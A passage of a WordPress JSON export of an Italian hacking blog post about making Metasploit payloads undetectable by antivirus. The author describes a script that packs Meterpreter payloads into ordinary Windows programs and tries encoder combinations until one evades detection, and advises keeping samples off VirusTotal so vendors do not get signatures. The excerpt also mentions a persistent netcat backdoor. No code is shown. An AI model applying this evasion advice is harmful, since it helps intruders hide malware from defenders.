l&#8217;unico sistema certo&#8230;.<\/li>\n<li>oppure, l&#8217;ultima possibilit\u00e0, non semplice ma tutto sommato abbastanza sicura \u00e8 seguire quello riportato in questi 2 articoli <a title=\"art1\" href=\"http:\/\/tinyurl.com\/5tjtr4x\" target=\"_blank\">http:\/\/tinyurl.com\/5tjtr4x<\/a> e<a title=\"art2\" href=\"http:\/\/tinyurl.com\/3v8zrkv\" target=\"_blank\"> http:\/\/tinyurl.com\/3v8zrkv<\/a> , li ho letti parecchie volte e sto ancora cercando di comprenderli bene, colpa mia e delle mie lacune nella programmazione&#8230; per ora restano di fatto la miglior soluzione per l&#8217;offuscamento del payload all&#8217;interno di un eseguibile. Se qualcuno passando di qui leggesse questo articolo e volesse commentare assieme a me e aiutarmi a sciogliere quei dubbi che mi son rimasti, sar\u00f2 ben felice di esporre i miei risultati e i miei &#8220;esperimenti&#8221; in merito.<\/li>\n<\/ul>\n<h6>Qualche considerazione sullo script:<\/h6>\n<p>&nbsp;<\/p>\n<p>Quello che ho scritto \u00e8 un semplice script in bash, non mi serviva che fosse scritto &#8220;bene&#8221;, mi serviva che facesse velocemente quei passaggi che altrimenti avrei dovuto ripete a mano decine e decine di volte&#8230; Il consiglio \u00e8 di giocare parecchio con gli encoder e con i vari payload, ricordatevi che dovete avere gi\u00e0 degli eseguibili di winzoz, io ho messenger, calc e flash, lo script vi scrive gi\u00e0 il .rc che msfconsole caricher\u00e0 avviando l&#8217;handler che si aspetta una connessione in entrata, se tutto va a buon fine dovreste avere una sessione di meterpreter aperta! Visto che l&#8217;operazione dovrete ripertela parecchie volte ho pensato che tenere traccia del tempo\/data fosse una buona idea per non sbagliare e confondere le dozzine di .exe che creerete prima di trovare la giusta combinazione tra encoders e payloads che non viene rilevata dagli AV&#8230;. Il flag -t ora \u00e8 impostato su vbs, consiglio di provare prima con raw e poi con exe!\u00a0 Altro consiglio MOLTO importante, \u00e8 scritto chiaramente anche nell&#8217;articolo: l&#8217;utilizzo di virustotal \u00e8 da evitare, a forza di caricare gli eseguibili ormai le signature di msf sono sputtanate, questo \u00e8 il grosso problema che ora non ci permette di portare a termine una sessione di pentest, \u00e8 vero da un lato \u00e8 una buona cosa in quanto almeno possiamo stare sicuri che il primo stronzetto non ci infetti, ma dall&#8217; altro lato ci rende la vita difficile a volte &#8220;inutilmente&#8221;, quindi, evitate di fare scansioni con virustotal se non volete che il giorno dopo la vostra creazione sia riconosciuta da tutti gli antivirus, virustotal essendo in partnership con le case produttrici di AV rilascia le vostre signature!! =) Spero che qualcuno si sia interessato alla questione e si faccia avanti!<\/p>\n<p>A risentirci presto e magari ci saranno altre news!!! Bella!!<\/p>\n<p>noyse<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Questo \u00e8 il secondo articolo, spiega come creare un payload quanto pi\u00f9 &#8220;undetectable&#8221; dagli antivirus e, una volta exploitato il sistema, creare una backdoor persistente con netcat. Oltre a questo, a fine articolo, ci saranno sviluppi sulla questione &#8220;sgamabile\/non sgamabile&#8221;, in allegato c&#8217;\u00e8 pure lo script che ho scritto per velocizzare le operazioni di creazione [&hellip;]<\/p>\n","protected":false},"author":5820,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[13,35,36],"class_list":["post-250","post","type-post","status-publish","format-standard","hentry","category-howto","tag-hack","tag-meterpreter","tag-payload-undetected"],"_links":{"self":[{"href":"https:\/\/under12oot.noblogs.org\/index.php?rest_route=\/wp\/v2\/posts\/250","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/under12oot.noblogs.org\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/under12oot.noblogs.org\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/under12oot.noblogs.org\/index.php?rest_route=\/wp\/v2\/users\/5820"}],"replies":[{"embeddable":true,"href":"https:\/\/under12oot.noblogs.org\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=250"}],"version-history":[{"count":17,"href":"https:\/\/under12oot.noblogs.org\/index.php?rest_route=\/wp\/v2\/posts\/250\/revisions"}],"predecessor-version":[{"id":269,"href":"https:\/\/under12oot.noblogs.org\/index.php?rest_route=\/wp\/v2\/posts\/250\/revisions\/269"}],"wp:attachment":[{"href":"https:\/\/under12oot.noblogs.org\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=250"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/under12oot.noblogs.org\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=250"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/under12oot.noblogs.org\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=250"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}